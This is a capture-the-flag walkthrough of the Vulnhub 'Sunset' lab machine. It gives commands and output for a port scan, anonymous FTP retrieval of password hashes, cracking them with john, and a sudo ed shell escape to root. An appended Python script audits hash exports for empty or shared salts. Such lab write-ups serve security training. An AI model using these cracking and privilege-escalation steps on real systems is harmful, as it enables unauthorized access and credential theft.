• Sunset: Vulnhub Walkthrough


    Host scan:

    ╰─ nmap -p1-65535 -sV -A 10.10.202.147

    PORT STATE SERVICE VERSION
    21/tcp open ftp pyftpdlib 1.5.5
    | ftp-anon: Anonymous FTP login allowed (FTP code 230)
    |_-rw-r--r-- 1 root root 1062 Jul 29 00:00 backup
    | ftp-syst:
    | STAT:
    | FTP server status:
    | Connected to: 10.10.202.147:21
    | Waiting for username.
    | TYPE: ASCII; STRUcture: File; MODE: Stream
    | Data connection closed.
    |_End of status.
    22/tcp open ssh OpenSSH 7.9p1 Debian 10 (protocol 2.0)
    | ssh-hostkey:
    | 2048 71:bd:fa:c5:8c:88:7c:22:14:c4:20:03:32:36:05:d6 (RSA)
    | 256 35:92:8e:16:43:0c:39:88:8e:83:0d:e2:2c:a4:65:91 (ECDSA)
    |_ 256 45:c5:40:14:49:cf:80:3c:41:4f:bb:22:6c:80:1e:fe (ED25519)

    Anonymous FTP access

    username: anonymous

    password: (empty)

    ╰─ cat backup
    CREDENTIALS:
    office:$6$$9ZYTy.VI0M7cG9tVcPl.QZZi2XHOUZ9hLsiCr/avWTajSPHqws7.75I9ZjP4HwLN3Gvio5To4gjBdeDGzhq.X.
    datacenter:$6$$3QW/J4OlV3naFDbhuksxRXLrkR6iKo4gh.Zx1RfZC2OINKMiJ/6Ffyl33OFtBvCI7S4N1b8vlDylF2hG2N0NN/
    sky:$6$$Ny8IwgIPYq5pHGZqyIXmoVRRmWydH7u2JbaTo.H2kNG7hFtR.pZb94.HjeTK1MLyBxw8PUeyzJszcwfH0qepG0
    sunset:$6$406THujdibTNu./R$NzquK0QRsbAUUSrHcpR2QrrlU3fA/SJo7sPDPbP3xcCR/lpbgMXS67Y27KtgLZAcJq9KZpEKEqBHFLzFSZ9bo/
    space:$6$$4NccGQWPfiyfGKHgyhJBgiadOlP/FM4.Qwl1yIWP28ABx.YuOsiRaiKKU.4A1HKs9XLXtq8qFuC3W6SCE4Ltx/

    Brute-force the hashes with john

    Copy the hashes into a new text file, 1.txt

    ╰─ john 1.txt 

    View the cracked passwords

    ╰─ john --show 1.txt

    sky:sky
    sunset:cheer14
    space:space

    After trying them: sunset:cheer14 can log in to the system

    Privilege escalation attempt:

    sudo /usr/bin/ed
    !/bin/bash
    root@sunset:/home/sunset#
    root@sunset:/home/sunset# id
    uid=0(root) gid=0(root) groups=0(root)

    Done!
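
Added example, not part of the original walkthrough: four of the five entries in the backup file above start with `$6$$`, which is sha512crypt with an empty salt. The audit below flags that condition, reused salts and legacy schemes in a shadow-style export; the usernames, salts and digests in `SAMPLE` are constructed placeholders, and the `LEGACY` table is this example's own assumption.

```python
import re
from collections import defaultdict

# Modular crypt format as seen in the backup: user:$id$[rounds=N$]salt$digest
MCF = re.compile(r"^(?P<user>[^:]+):\$(?P<id>[0-9a-z]+)\$(?:rounds=\d+\$)?"
                 r"(?P<salt>[^$]*)\$(?P<digest>[./0-9A-Za-z]+)$")
LEGACY = {"1": "md5crypt"}  # scheme ids treated as legacy in this example

def audit(lines):
    """Return {user: [findings]} for shadow-style 'user:hash' lines."""
    findings = defaultdict(list)
    salt_users = defaultdict(list)  # (scheme id, salt) -> users
    for raw in lines:
        line = raw.strip()
        if not line or line.endswith(":"):
            continue  # blank line or a header such as "CREDENTIALS:"
        m = MCF.match(line)
        if m is None:
            findings[line.split(":", 1)[0]].append("unrecognised hash format")
            continue
        user, scheme, salt = m["user"], m["id"], m["salt"]
        if scheme in LEGACY:
            findings[user].append(f"legacy scheme {LEGACY[scheme]}")
        if salt == "":
            # No salt: equal passwords give equal digests on every account
            findings[user].append("empty salt")
        else:
            salt_users[(scheme, salt)].append(user)
    for users in salt_users.values():
        if len(users) > 1:
            for u in users:
                others = ", ".join(x for x in users if x != u)
                findings[u].append(f"salt shared with {others}")
    return dict(findings)

DIGEST = "x" * 86  # constructed placeholder, not a real sha512crypt digest
SAMPLE = [  # constructed input shaped like the backup file
    "CREDENTIALS:",
    f"alice:$6$${DIGEST}",
    f"bob:$6$${DIGEST}",
    f"carol:$6$Abcdefgh12345678${DIGEST}",
    f"dave:$6$rounds=10000$sharedsalt${DIGEST}",
    f"erin:$6$sharedsalt${DIGEST}",
    f"frank:$1$oldsalt${'y' * 22}",
]

if __name__ == "__main__":
    for user, notes in audit(SAMPLE).items():
        print(f"{user}: {'; '.join(notes)}")
```

Accounts with a unique, non-empty salt and a current scheme (here `carol`) produce no findings and are absent from the result.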

  • Original article: https://www.cnblogs.com/hack404/p/11298094.html